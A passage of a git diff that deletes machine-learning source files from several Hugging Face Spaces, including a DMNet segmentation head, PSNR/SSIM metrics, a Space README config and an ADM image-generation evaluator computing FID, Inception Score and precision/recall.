name, child in module.named_children(): - if isinstance(child, - (nn.modules.batchnorm._BatchNorm, nn.SyncBatchNorm)): - if last_conv is None: # only fuse BN that is after Conv - continue - fused_conv = _fuse_conv_bn(last_conv, child) - module._modules[last_conv_name] = fused_conv - # To reduce changes, set BN as Identity instead of deleting it. - module._modules[name] = nn.Identity() - last_conv = None - elif isinstance(child, nn.Conv2d): - last_conv = child - last_conv_name = name - else: - fuse_conv_bn(child) - return module diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/dm_head.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/dm_head.py deleted file mode 100644 index de6d0f6390d96c1eef4242cdc9aed91ec7714c6a..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/mmpkg/mmseg/models/decode_heads/dm_head.py +++ /dev/null @@ -1,140 +0,0 @@ -import torch -import torch.nn as nn -import torch.nn.functional as F -from annotator.mmpkg.mmcv.cnn import ConvModule, build_activation_layer, build_norm_layer - -from ..builder import HEADS -from .decode_head import BaseDecodeHead - - -class DCM(nn.Module): - """Dynamic Convolutional Module used in DMNet. - - Args: - filter_size (int): The filter size of generated convolution kernel - used in Dynamic Convolutional Module. - fusion (bool): Add one conv to fuse DCM output feature. - in_channels (int): Input channels. - channels (int): Channels after modules, before conv_seg. - conv_cfg (dict | None): Config of conv layers. - norm_cfg (dict | None): Config of norm layers. - act_cfg (dict): Config of activation layers. - """ - - def __init__(self, filter_size, fusion, in_channels, channels, conv_cfg, - norm_cfg, act_cfg): - super(DCM, self).__init__() - self.filter_size = filter_size - self.fusion = fusion - self.in_channels = in_channels - self.channels = channels - self.conv_cfg = conv_cfg - self.norm_cfg = norm_cfg - self.act_cfg = act_cfg - self.filter_gen_conv = nn.Conv2d(self.in_channels, self.channels, 1, 1, - 0) - - self.input_redu_conv = ConvModule( - self.in_channels, - self.channels, - 1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - - if self.norm_cfg is not None: - self.norm = build_norm_layer(self.norm_cfg, self.channels)[1] - else: - self.norm = None - self.activate = build_activation_layer(self.act_cfg) - - if self.fusion: - self.fusion_conv = ConvModule( - self.channels, - self.channels, - 1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - - def forward(self, x): - """Forward function.""" - generated_filter = self.filter_gen_conv( - F.adaptive_avg_pool2d(x, self.filter_size)) - x = self.input_redu_conv(x) - b, c, h, w = x.shape - # [1, b * c, h, w], c = self.channels - x = x.view(1, b * c, h, w) - # [b * c, 1, filter_size, filter_size] - generated_filter = generated_filter.view(b * c, 1, self.filter_size, - self.filter_size) - pad = (self.filter_size - 1) // 2 - if (self.filter_size - 1) % 2 == 0: - p2d = (pad, pad, pad, pad) - else: - p2d = (pad + 1, pad, pad + 1, pad) - x = F.pad(input=x, pad=p2d, mode='constant', value=0) - # [1, b * c, h, w] - output = F.conv2d(input=x, weight=generated_filter, groups=b * c) - # [b, c, h, w] - output = output.view(b, c, h, w) - if self.norm is not None: - output = self.norm(output) - output = self.activate(output) - - if self.fusion: - output = self.fusion_conv(output) - - return output - - -@HEADS.register_module() -class DMHead(BaseDecodeHead): - """Dynamic Multi-scale Filters for Semantic Segmentation. - - This head is the implementation of - `DMNet `_. - - Args: - filter_sizes (tuple[int]): The size of generated convolutional filters - used in Dynamic Convolutional Module. Default: (1, 3, 5, 7). - fusion (bool): Add one conv to fuse DCM output feature. - """ - - def __init__(self, filter_sizes=(1, 3, 5, 7), fusion=False, **kwargs): - super(DMHead, self).__init__(**kwargs) - assert isinstance(filter_sizes, (list, tuple)) - self.filter_sizes = filter_sizes - self.fusion = fusion - dcm_modules = [] - for filter_size in self.filter_sizes: - dcm_modules.append( - DCM(filter_size, - self.fusion, - self.in_channels, - self.channels, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg)) - self.dcm_modules = nn.ModuleList(dcm_modules) - self.bottleneck = ConvModule( - self.in_channels + len(filter_sizes) * self.channels, - self.channels, - 3, - padding=1, - conv_cfg=self.conv_cfg, - norm_cfg=self.norm_cfg, - act_cfg=self.act_cfg) - - def forward(self, inputs): - """Forward function.""" - x = self._transform_inputs(inputs) - dcm_outs = [x] - for dcm_module in self.dcm_modules: - dcm_outs.append(dcm_module(x)) - dcm_outs = torch.cat(dcm_outs, dim=1) - output = self.bottleneck(dcm_outs) - output = self.cls_seg(output) - return output diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/proposal_generator/__init__.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/proposal_generator/__init__.py deleted file mode 100644 index 3f4e4df7645c67b7a013295207b98fe70b2e574c..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/oneformer/detectron2/modeling/proposal_generator/__init__.py +++ /dev/null @@ -1,5 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -from .build import PROPOSAL_GENERATOR_REGISTRY, build_proposal_generator -from .rpn import RPN_HEAD_REGISTRY, build_rpn_head, RPN, StandardRPNHead - -__all__ = list(globals().keys()) diff --git a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/ops/contour_expand.py b/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/ops/contour_expand.py deleted file mode 100644 index ea1111e1768b5f27e118bf7dbc0d9c70a7afd6d7..0000000000000000000000000000000000000000 --- a/spaces/coreml-community/ControlNet-v1-1-Annotators-cpu/annotator/uniformer/mmcv/ops/contour_expand.py +++ /dev/null @@ -1,49 +0,0 @@ -# Copyright (c) OpenMMLab. All rights reserved. -import numpy as np -import torch - -from ..utils import ext_loader - -ext_module = ext_loader.load_ext('_ext', ['contour_expand']) - - -def contour_expand(kernel_mask, internal_kernel_label, min_kernel_area, - kernel_num): - """Expand kernel contours so that foreground pixels are assigned into - instances. - - Arguments: - kernel_mask (np.array or Tensor): The instance kernel mask with - size hxw. - internal_kernel_label (np.array or Tensor): The instance internal - kernel label with size hxw. - min_kernel_area (int): The minimum kernel area. - kernel_num (int): The instance kernel number. - - Returns: - label (list): The instance index map with size hxw. - """ - assert isinstance(kernel_mask, (torch.Tensor, np.ndarray)) - assert isinstance(internal_kernel_label, (torch.Tensor, np.ndarray)) - assert isinstance(min_kernel_area, int) - assert isinstance(kernel_num, int) - - if isinstance(kernel_mask, np.ndarray): - kernel_mask = torch.from_numpy(kernel_mask) - if isinstance(internal_kernel_label, np.ndarray): - internal_kernel_label = torch.from_numpy(internal_kernel_label) - - if torch.__version__ == 'parrots': - if kernel_mask.shape[0] == 0 or internal_kernel_label.shape[0] == 0: - label = [] - else: - label = ext_module.contour_expand( - kernel_mask, - internal_kernel_label, - min_kernel_area=min_kernel_area, - kernel_num=kernel_num) - label = label.tolist() - else: - label = ext_module.contour_expand(kernel_mask, internal_kernel_label, - min_kernel_area, kernel_num) - return label diff --git a/spaces/cscan/CodeFormer/CodeFormer/basicsr/metrics/psnr_ssim.py b/spaces/cscan/CodeFormer/CodeFormer/basicsr/metrics/psnr_ssim.py deleted file mode 100644 index bbd950699c2495880236883861d9e199f900eae8..0000000000000000000000000000000000000000 --- a/spaces/cscan/CodeFormer/CodeFormer/basicsr/metrics/psnr_ssim.py +++ /dev/null @@ -1,128 +0,0 @@ -import cv2 -import numpy as np - -from basicsr.metrics.metric_util import reorder_image, to_y_channel -from basicsr.utils.registry import METRIC_REGISTRY - - -@METRIC_REGISTRY.register() -def calculate_psnr(img1, img2, crop_border, input_order='HWC', test_y_channel=False): - """Calculate PSNR (Peak Signal-to-Noise Ratio). - - Ref: https://en.wikipedia.org/wiki/Peak_signal-to-noise_ratio - - Args: - img1 (ndarray): Images with range [0, 255]. - img2 (ndarray): Images with range [0, 255]. - crop_border (int): Cropped pixels in each edge of an image. These - pixels are not involved in the PSNR calculation. - input_order (str): Whether the input order is 'HWC' or 'CHW'. - Default: 'HWC'. - test_y_channel (bool): Test on Y channel of YCbCr. Default: False. - - Returns: - float: psnr result. - """ - - assert img1.shape == img2.shape, (f'Image shapes are differnet: {img1.shape}, {img2.shape}.') - if input_order not in ['HWC', 'CHW']: - raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' '"HWC" and "CHW"') - img1 = reorder_image(img1, input_order=input_order) - img2 = reorder_image(img2, input_order=input_order) - img1 = img1.astype(np.float64) - img2 = img2.astype(np.float64) - - if crop_border != 0: - img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...] - img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...] - - if test_y_channel: - img1 = to_y_channel(img1) - img2 = to_y_channel(img2) - - mse = np.mean((img1 - img2)**2) - if mse == 0: - return float('inf') - return 20. * np.log10(255. / np.sqrt(mse)) - - -def _ssim(img1, img2): - """Calculate SSIM (structural similarity) for one channel images. - - It is called by func:`calculate_ssim`. - - Args: - img1 (ndarray): Images with range [0, 255] with order 'HWC'. - img2 (ndarray): Images with range [0, 255] with order 'HWC'. - - Returns: - float: ssim result. - """ - - C1 = (0.01 * 255)**2 - C2 = (0.03 * 255)**2 - - img1 = img1.astype(np.float64) - img2 = img2.astype(np.float64) - kernel = cv2.getGaussianKernel(11, 1.5) - window = np.outer(kernel, kernel.transpose()) - - mu1 = cv2.filter2D(img1, -1, window)[5:-5, 5:-5] - mu2 = cv2.filter2D(img2, -1, window)[5:-5, 5:-5] - mu1_sq = mu1**2 - mu2_sq = mu2**2 - mu1_mu2 = mu1 * mu2 - sigma1_sq = cv2.filter2D(img1**2, -1, window)[5:-5, 5:-5] - mu1_sq - sigma2_sq = cv2.filter2D(img2**2, -1, window)[5:-5, 5:-5] - mu2_sq - sigma12 = cv2.filter2D(img1 * img2, -1, window)[5:-5, 5:-5] - mu1_mu2 - - ssim_map = ((2 * mu1_mu2 + C1) * (2 * sigma12 + C2)) / ((mu1_sq + mu2_sq + C1) * (sigma1_sq + sigma2_sq + C2)) - return ssim_map.mean() - - -@METRIC_REGISTRY.register() -def calculate_ssim(img1, img2, crop_border, input_order='HWC', test_y_channel=False): - """Calculate SSIM (structural similarity). - - Ref: - Image quality assessment: From error visibility to structural similarity - - The results are the same as that of the official released MATLAB code in - https://ece.uwaterloo.ca/~z70wang/research/ssim/. - - For three-channel images, SSIM is calculated for each channel and then - averaged. - - Args: - img1 (ndarray): Images with range [0, 255]. - img2 (ndarray): Images with range [0, 255]. - crop_border (int): Cropped pixels in each edge of an image. These - pixels are not involved in the SSIM calculation. - input_order (str): Whether the input order is 'HWC' or 'CHW'. - Default: 'HWC'. - test_y_channel (bool): Test on Y channel of YCbCr. Default: False. - - Returns: - float: ssim result. - """ - - assert img1.shape == img2.shape, (f'Image shapes are differnet: {img1.shape}, {img2.shape}.') - if input_order not in ['HWC', 'CHW']: - raise ValueError(f'Wrong input_order {input_order}. Supported input_orders are ' '"HWC" and "CHW"') - img1 = reorder_image(img1, input_order=input_order) - img2 = reorder_image(img2, input_order=input_order) - img1 = img1.astype(np.float64) - img2 = img2.astype(np.float64) - - if crop_border != 0: - img1 = img1[crop_border:-crop_border, crop_border:-crop_border, ...] - img2 = img2[crop_border:-crop_border, crop_border:-crop_border, ...] - - if test_y_channel: - img1 = to_y_channel(img1) - img2 = to_y_channel(img2) - - ssims = [] - for i in range(img1.shape[2]): - ssims.append(_ssim(img1[..., i], img2[..., i])) - return np.array(ssims).mean() diff --git a/spaces/cscan/demucs/README.md b/spaces/cscan/demucs/README.md deleted file mode 100644 index 3a493fd8314ccbfede66b0826228fb4dc9bed219..0000000000000000000000000000000000000000 --- a/spaces/cscan/demucs/README.md +++ /dev/null @@ -1,39 +0,0 @@ ---- -title: Demucs -emoji: ⚡ -colorFrom: pink -colorTo: indigo -sdk: gradio -sdk_version: 3.15.0 -app_file: app.py -pinned: false -duplicated_from: akhaliq/demucs ---- - -# Configuration - -`title`: _string_ -Display title for the Space - -`emoji`: _string_ -Space emoji (emoji-only character allowed) - -`colorFrom`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`colorTo`: _string_ -Color for Thumbnail gradient (red, yellow, green, blue, indigo, purple, pink, gray) - -`sdk`: _string_ -Can be either `gradio` or `streamlit` - -`sdk_version` : _string_ -Only applicable for `streamlit` SDK. -See [doc](https://hf.co/docs/hub/spaces) for more info on supported versions. - -`app_file`: _string_ -Path to your main application file (which contains either `gradio` or `streamlit` Python code). -Path is relative to the root of the repository. - -`pinned`: _boolean_ -Whether the Space stays on top of your list. diff --git a/spaces/cvlab/zero123-live/ldm/modules/evaluate/adm_evaluator.py b/spaces/cvlab/zero123-live/ldm/modules/evaluate/adm_evaluator.py deleted file mode 100644 index 508cddf206e9aa8b2fa1de32e69a7b78acee13c0..0000000000000000000000000000000000000000 --- a/spaces/cvlab/zero123-live/ldm/modules/evaluate/adm_evaluator.py +++ /dev/null @@ -1,676 +0,0 @@ -import argparse -import io -import os -import random -import warnings -import zipfile -from abc import ABC, abstractmethod -from contextlib import contextmanager -from functools import partial -from multiprocessing import cpu_count -from multiprocessing.pool import ThreadPool -from typing import Iterable, Optional, Tuple -import yaml - -import numpy as np -import requests -import tensorflow.compat.v1 as tf -from scipy import linalg -from tqdm.auto import tqdm - -INCEPTION_V3_URL = "https://openaipublic.blob.core.windows.net/diffusion/jul-2021/ref_batches/classify_image_graph_def.pb" -INCEPTION_V3_PATH = "classify_image_graph_def.pb" - -FID_POOL_NAME = "pool_3:0" -FID_SPATIAL_NAME = "mixed_6/conv:0" - -REQUIREMENTS = f"This script has the following requirements: \n" \ - 'tensorflow-gpu>=2.0' + "\n" + 'scipy' + "\n" + "requests" + "\n" + "tqdm" - - -def main(): - parser = argparse.ArgumentParser() - parser.add_argument("--ref_batch", help="path to reference batch npz file") - parser.add_argument("--sample_batch", help="path to sample batch npz file") - args = parser.parse_args() - - config = tf.ConfigProto( - allow_soft_placement=True # allows DecodeJpeg to run on CPU in Inception graph - ) - config.gpu_options.allow_growth = True - evaluator = Evaluator(tf.Session(config=config)) - - print("warming up TensorFlow...") - # This will cause TF to print a bunch of verbose stuff now rather - # than after the next print(), to help prevent confusion. - evaluator.warmup() - - print("computing reference batch activations...") - ref_acts = evaluator.read_activations(args.ref_batch) - print("computing/reading reference batch statistics...") - ref_stats, ref_stats_spatial = evaluator.read_statistics(args.ref_batch, ref_acts) - - print("computing sample batch activations...") - sample_acts = evaluator.read_activations(args.sample_batch) - print("computing/reading sample batch statistics...") - sample_stats, sample_stats_spatial = evaluator.read_statistics(args.sample_batch, sample_acts) - - print("Computing evaluations...") - is_ = evaluator.compute_inception_score(sample_acts[0]) - print("Inception Score:", is_) - fid = sample_stats.frechet_distance(ref_stats) - print("FID:", fid) - sfid = sample_stats_spatial.frechet_distance(ref_stats_spatial) - print("sFID:", sfid) - prec, recall = evaluator.compute_prec_recall(ref_acts[0], sample_acts[0]) - print("Precision:", prec) - print("Recall:", recall) - - savepath = '/'.join(args.sample_batch.split('/')[:-1]) - results_file = os.path.join(savepath,'evaluation_metrics.yaml') - print(f'Saving evaluation results to "{results_file}"') - - results = { - 'IS': is_, - 'FID': fid, - 'sFID': sfid, - 'Precision:':prec, - 'Recall': recall - } - - with open(results_file, 'w') as f: - yaml.dump(results, f, default_flow_style=False) - -class InvalidFIDException(Exception): - pass - - -class FIDStatistics: - def __init__(self, mu: np.ndarray, sigma: np.ndarray): - self.mu = mu - self.sigma = sigma - - def frechet_distance(self, other, eps=1e-6): - """ - Compute the Frechet distance between two sets of statistics. - """ - # https://github.com/bioinf-jku/TTUR/blob/73ab375cdf952a12686d9aa7978567771084da42/fid.py#L132 - mu1, sigma1 = self.mu, self.sigma - mu2, sigma2 = other.mu, other.sigma - - mu1 = np.atleast_1d(mu1) - mu2 = np.atleast_1d(mu2) - - sigma1 = np.atleast_2d(sigma1) - sigma2 = np.atleast_2d(sigma2) - - assert ( - mu1.shape == mu2.shape - ), f"Training and test mean vectors have different lengths: {mu1.shape}, {mu2.shape}" - assert ( - sigma1.shape == sigma2.shape - ), f"Training and test covariances have different dimensions: {sigma1.shape}, {sigma2.shape}" - - diff = mu1 - mu2 - - # product might be almost singular - covmean, _ = linalg.sqrtm(sigma1.dot(sigma2), disp=False) - if not np.isfinite(covmean).all(): - msg = ( - "fid calculation produces singular product; adding %s to diagonal of cov estimates" - % eps - ) - warnings.warn(msg) - offset = np.eye(sigma1.shape[0]) * eps - covmean = linalg.sqrtm((sigma1 + offset).dot(sigma2 + offset)) - - # numerical error might give slight imaginary component - if np.iscomplexobj(covmean): - if not np.allclose(np.diagonal(covmean).imag, 0, atol=1e-3): - m = np.max(np.abs(covmean.imag)) - raise ValueError("Imaginary component {}".format(m)) - covmean = covmean.real - - tr_covmean = np.trace(covmean) - - return diff.dot(diff) + np.trace(sigma1) + np.trace(sigma2) - 2 * tr_covmean - - -class Evaluator: - def __init__( - self, - session, - batch_size=64, - softmax_batch_size=512, - ): - self.sess = session - self.batch_size = batch_size - self.softmax_batch_size = softmax_batch_size - self.manifold_estimator = ManifoldEstimator(session) - with self.sess.graph.as_default(): - self.image_input = tf.placeholder(tf.float32, shape=[None, None, None, 3]) - self.softmax_input = tf.placeholder(tf.float32, shape=[None, 2048]) - self.pool_features, self.spatial_features = _create_feature_graph(self.image_input) - self.softmax = _create_softmax_graph(self.softmax_input) - - def warmup(self): - self.compute_activations(np.zeros([1, 8, 64, 64, 3])) - - def read_activations(self, npz_path: str) -> Tuple[np.ndarray, np.ndarray]: - with open_npz_array(npz_path, "arr_0") as reader: - return self.compute_activations(reader.read_batches(self.batch_size)) - - def compute_activations(self, batches: Iterable[np.ndarray],silent=False) -> Tuple[np.ndarray, np.ndarray]: - """ - Compute image features for downstream evals. - - :param batches: a iterator over NHWC numpy arrays in [0, 255]. - :return: a tuple of numpy arrays of shape [N x X], where X is a feature - dimension. The tuple is (pool_3, spatial). - """ - preds = [] - spatial_preds = [] - it = batches if silent else tqdm(batches) - for batch in it: - batch = batch.astype(np.float32) - pred, spatial_pred = self.sess.run( - [self.pool_features, self.spatial_features], {self.image_input: batch} - ) - preds.append(pred.reshape([pred.shape[0], -1])) - spatial_preds.append(spatial_pred.reshape([spatial_pred.shape[0], -1])) - return ( - np.concatenate(preds, axis=0), - np.concatenate(spatial_preds, axis=0), - ) - - def read_statistics( - self, npz_path: str, activations: Tuple[np.ndarray, np.ndarray] - ) -> Tuple[FIDStatistics, FIDStatistics]: - obj = np.load(npz_path) - if "mu" in list(obj.keys()): - return FIDStatistics(obj["mu"], obj["sigma"]), FIDStatistics( - obj["mu_s"], obj["sigma_s"] - ) - return tuple(self.compute_statistics(x) for x in activations) - - def compute_statistics(self, activations: np.ndarray) -> FIDStatistics: - mu = np.mean(activations, axis=0) - sigma = np.cov(activations, rowvar=False) - return FIDStatistics(mu, sigma) - - def compute_inception_score(self, activations: np.ndarray, split_size: int = 5000) -> float: - softmax_out = [] - for i in range(0, len(activations), self.softmax_batch_size): - acts = activations[i : i + self.softmax_batch_size] - softmax_out.append(self.sess.run(self.softmax, feed_dict={self.softmax_input: acts})) - preds = np.concatenate(softmax_out, axis=0) - # https://github.com/openai/improved-gan/blob/4f5d1ec5c16a7eceb206f42bfc652693601e1d5c/inception_score/model.py#L46 - scores = [] - for i in range(0, len(preds), split_size): - part = preds[i : i + split_size] - kl = part * (np.log(part) - np.log(np.expand_dims(np.mean(part, 0), 0))) - kl = np.mean(np.sum(kl, 1)) - scores.append(np.exp(kl)) - return float(np.mean(scores)) - - def compute_prec_recall( - self, activations_ref: np.ndarray, activations_sample: np.ndarray - ) -> Tuple[float, float]: - radii_1 = self.manifold_estimator.manifold_radii(activations_ref) - radii_2 = self.manifold_estimator.manifold_radii(activations_sample) - pr = self.manifold_estimator.evaluate_pr( - activations_ref, radii_1, activations_sample, radii_2 - ) - return (float(pr[0][0]), float(pr[1][0])) - - -class ManifoldEstimator: - """ - A helper for comparing manifolds of feature vectors. - - Adapted from https://github.com/kynkaat/improved-precision-and-recall-metric/blob/f60f25e5ad933a79135c783fcda53de30f42c9b9/precision_recall.py#L57 - """ - - def __init__( - self, - session, - row_batch_size=10000, - col_batch_size=10000, - nhood_sizes=(3,), - clamp_to_percentile=None, - eps=1e-5, - ): - """ - Estimate the manifold of given feature vectors. - - :param session: the TensorFlow session. - :param row_batch_size: row batch size to compute pairwise distances - (parameter to trade-off between memory usage and performance). - :param col_batch_size: column batch size to compute pairwise distances. - :param nhood_sizes: number of neighbors used to estimate the manifold. - :param clamp_to_percentile: prune hyperspheres that have radius larger than - the given percentile. - :param eps: small number for numerical stability. - """ - self.distance_block = DistanceBlock(session) - self.row_batch_size = row_batch_size - self.col_batch_size = col_batch_size - self.nhood_sizes = nhood_sizes - self.num_nhoods = len(nhood_sizes) - self.clamp_to_percentile = clamp_to_percentile - self.eps = eps - - def warmup(self): - feats, radii = ( - np.zeros([1, 2048], dtype=np.float32), - np.zeros([1, 1], dtype=np.float32), - ) - self.evaluate_pr(feats, radii, feats, radii) - - def manifold_radii(self, features: np.ndarray) -> np.ndarray: - num_images = len(features) - - # Estimate manifold of features by calculating distances to k-NN of each sample. - radii = np.zeros([num_images, self.num_nhoods], dtype=np.float32) - distance_batch = np.zeros([self.row_batch_size, num_images], dtype=np.float32) - seq = np.arange(max(self.nhood_sizes) + 1, dtype=np.int32) - - for begin1 in range(0, num_images, self.row_batch_size): - end1 = min(begin1 + self.row_batch_size, num_images) - row_batch = features[begin1:end1] - - for begin2 in range(0, num_images, self.col_batch_size): - end2 = min(begin2 + self.col_batch_size, num_images) - col_batch = features[begin2:end2] - - # Compute distances between batches. - distance_batch[ - 0 : end1 - begin1, begin2:end2 - ] = self.distance_block.pairwise_distances(row_batch, col_batch) - - # Find the k-nearest neighbor from the current batch. - radii[begin1:end1, :] = np.concatenate( - [ - x[:, self.nhood_sizes] - for x in _numpy_partition(distance_batch[0 : end1 - begin1, :], seq, axis=1) - ], - axis=0, - ) - - if self.clamp_to_percentile is not None: - max_distances = np.percentile(radii, self.clamp_to_percentile, axis=0) - radii[radii > max_distances] = 0 - return radii - - def evaluate(self, features: np.ndarray, radii: np.ndarray, eval_features: np.ndarray): - """ - Evaluate if new feature vectors are at the manifold. - """ - num_eval_images = eval_features.shape[0] - num_ref_images = radii.shape[0] - distance_batch = np.zeros([self.row_batch_size, num_ref_images], dtype=np.float32) - batch_predictions = np.zeros([num_eval_images, self.num_nhoods], dtype=np.int32) - max_realism_score = np.zeros([num_eval_images], dtype=np.float32) - nearest_indices = np.zeros([num_eval_images], dtype=np.int32) - - for begin1 in range(0, num_eval_images, self.row_batch_size): - end1 = min(begin1 + self.row_batch_size, num_eval_images) - feature_batch = eval_features[begin1:end1] - - for begin2 in range(0, num_ref_images, self.col_batch_size): - end2 = min(begin2 + self.col_batch_size, num_ref_images) - ref_batch = features[begin2:end2] - - distance_batch[ - 0 : end1 - begin1, begin2:end2 - ] = self.distance_block.pairwise_distances(feature_batch, ref_batch) - - # From the minibatch of new feature vectors, determine if they are in the estimated manifold. - # If a feature vector is inside a hypersphere of some reference sample, then - # the new sample lies at the estimated manifold. - # The radii of the hyperspheres are determined from distances of neighborhood size k. - samples_in_manifold = distance_batch[0 : end1 - begin1, :, None] <= radii - batch_predictions[begin1:end1] = np.any(samples_in_manifold, axis=1).astype(np.int32) - - max_realism_score[begin1:end1] = np.max( - radii[:, 0] / (distance_batch[0 : end1 - begin1, :] + self.eps), axis=1 - ) - nearest_indices[begin1:end1] = np.argmin(distance_batch[0 : end1 - begin1, :], axis=1) - - return { - "fraction": float(np.mean(batch_predictions)), - "batch_predictions": batch_predictions, - "max_realisim_score": max_realism_score, - "nearest_indices": nearest_indices, - } - - def evaluate_pr( - self, - features_1: np.ndarray, - radii_1: np.ndarray, - features_2: np.ndarray, - radii_2: np.ndarray, - ) -> Tuple[np.ndarray, np.ndarray]: - """ - Evaluate precision and recall efficiently. - - :param features_1: [N1 x D] feature vectors for reference batch. - :param radii_1: [N1 x K1] radii for reference vectors. - :param features_2: [N2 x D] feature vectors for the other batch. - :param radii_2: [N x K2] radii for other vectors. - :return: a tuple of arrays for (precision, recall): - - precision: an np.ndarray of length K1 - - recall: an np.ndarray of length K2 - """ - features_1_status = np.zeros([len(features_1), radii_2.shape[1]], dtype=np.bool) - features_2_status = np.zeros([len(features_2), radii_1.shape[1]], dtype=np.bool) - for begin_1 in range(0, len(features_1), self.row_batch_size): - end_1 = begin_1 + self.row_batch_size - batch_1 = features_1[begin_1:end_1] - for begin_2 in range(0, len(features_2), self.col_batch_size): - end_2 = begin_2 + self.col_batch_size - batch_2 = features_2[begin_2:end_2] - batch_1_in, batch_2_in = self.distance_block.less_thans( - batch_1, radii_1[begin_1:end_1], batch_2, radii_2[begin_2:end_2] - ) - features_1_status[begin_1:end_1] |= batch_1_in - features_2_status[begin_2:end_2] |= batch_2_in - return ( - np.mean(features_2_status.astype(np.float64), axis=0), - np.mean(features_1_status.astype(np.float64), axis=0), - ) - - -class DistanceBlock: - """ - Calculate pairwise distances between vectors. - - Adapted from https://github.com/kynkaat/improved-precision-and-recall-metric/blob/f60f25e5ad933a79135c783fcda53de30f42c9b9/precision_recall.py#L34 - """ - - def __init__(self, session): - self.session = session - - # Initialize TF graph to calculate pairwise distances. - with session.graph.as_default(): - self._features_batch1 = tf.placeholder(tf.float32, shape=[None, None]) - self._features_batch2 = tf.placeholder(tf.float32, shape=[None, None]) - distance_block_16 = _batch_pairwise_distances( - tf.cast(self._features_batch1, tf.float16), - tf.cast(self._features_batch2, tf.float16), - ) - self.distance_block = tf.cond( - tf.reduce_all(tf.math.is_finite(distance_block_16)), - lambda: tf.cast(distance_block_16, tf.float32), - lambda: _batch_pairwise_distances(self._features_batch1, self._features_batch2), - ) - - # Extra logic for less thans. - self._radii1 = tf.placeholder(tf.float32, shape=[None, None]) - self._radii2 = tf.placeholder(tf.float32, shape=[None, None]) - dist32 = tf.cast(self.distance_block, tf.float32)[..., None] - self._batch_1_in = tf.math.reduce_any(dist32 <= self._radii2, axis=1) - self._batch_2_in = tf.math.reduce_any(dist32 <= self._radii1[:, None], axis=0) - - def pairwise_distances(self, U, V): - """ - Evaluate pairwise distances between two batches of feature vectors. - """ - return self.session.run( - self.distance_block, - feed_dict={self._features_batch1: U, self._features_batch2: V}, - ) - - def less_thans(self, batch_1, radii_1, batch_2, radii_2): - return self.session.run( - [self._batch_1_in, self._batch_2_in], - feed_dict={ - self._features_batch1: batch_1, - self._features_batch2: batch_2, - self._radii1: radii_1, - self._radii2: radii_2, - }, - ) - - -def _batch_pairwise_distances(U, V): - """ - Compute pairwise distances between two batches of feature vectors. - """ - with tf.variable_scope("pairwise_dist_block"): - # Squared norms of each row in U and V. - norm_u = tf.reduce_sum(tf.square(U), 1) - norm_v = tf.reduce_sum(tf.square(V), 1) - - # norm_u as a column and norm_v as a row vectors. - norm_u = tf.reshape(norm_u, [-1, 1]) - norm_v = tf.reshape(norm_v, [1, -1]) - - # Pairwise squared Euclidean distances. - D = tf.maximum(norm_u - 2 * tf.matmul(U, V, False, True) + norm_v, 0.0) - - return D - - -class NpzArrayReader(ABC): - @abstractmethod - def read_batch(self, batch_size: int) -> Optional[np.ndarray]: - pass - - @abstractmethod - def remaining(self) -> int: - pass - - def read_batches(self, batch_size: int) -> Iterable[np.ndarray]: - def gen_fn(): - while True: - batch = self.read_batch(batch_size) - if batch is None: - break - yield batch - - rem = self.remaining() - num_batches = rem // batch_size + int(rem % batch_size != 0) - return BatchIterator(gen_fn, num_batches) - - -class BatchIterator: - def __init__(self, gen_fn, length): - self.gen_fn = gen_fn - self.length = length - - def __len__(self): - return self.length - - def __iter__(self): - return self.gen_fn() - - -class StreamingNpzArrayReader(NpzArrayReader): - def __init__(self, arr_f, shape, dtype): - self.arr_f = arr_f - self.shape = shape - self.dtype = dtype - self.idx = 0 - - def read_batch(self, batch_size: int) -> Optional[np.ndarray]: - if self.idx >= self.shape[0]: - return None - - bs = min(batch_size, self.shape[0] - self.idx) - self.idx += bs - - if self.dtype.itemsize == 0: - return np.ndarray([bs, *self.shape[1:]], dtype=self.dtype) - - read_count = bs * np.prod(self.shape[1:]) - read_size = int(read_count * self.dtype.itemsize) - data = _read_bytes(self.arr_f, read_size, "array data") - return np.frombuffer(data, dtype=self.dtype).reshape([bs, *self.shape[1:]]) - - def remaining(self) -> int: - return max(0, self.shape[0] - self.idx) - - -class MemoryNpzArrayReader(NpzArrayReader): - def __init__(self, arr): - self.arr = arr - self.idx = 0 - - @classmethod - def load(cls, path: str, arr_name: str): - with open(path, "rb") as f: - arr = np.load(f)[arr_name] - return cls(arr) - - def read_batch(self, batch_size: int) -> Optional[np.ndarray]: - if self.idx >= self.arr.shape[0]: - return None - - res = self.arr[self.idx : self.idx + batch_size] - self.idx += batch_size - return res - - def remaining(self) -> int: - return max(0, self.arr.shape[0] - self.idx) - - -@contextmanager -def open_npz_array(path: str, arr_name: str) -> NpzArrayReader: - with _open_npy_file(path, arr_name) as arr_f: - version = np.lib.format.read_magic(arr_f) - if version == (1, 0): - header = np.lib.format.read_array_header_1_0(arr_f) - elif version == (2, 0): - header = np.lib.format.read_array_header_2_0(arr_f) - else: - yield MemoryNpzArrayReader.load(path, arr_name) - return - shape, fortran, dtype = header - if fortran or dtype.hasobject: - yield MemoryNpzArrayReader.load(path, arr_name) - else: - yield StreamingNpzArrayReader(arr_f, shape, dtype) - - -def _read_bytes(fp, size, error_template="ran out of data"): 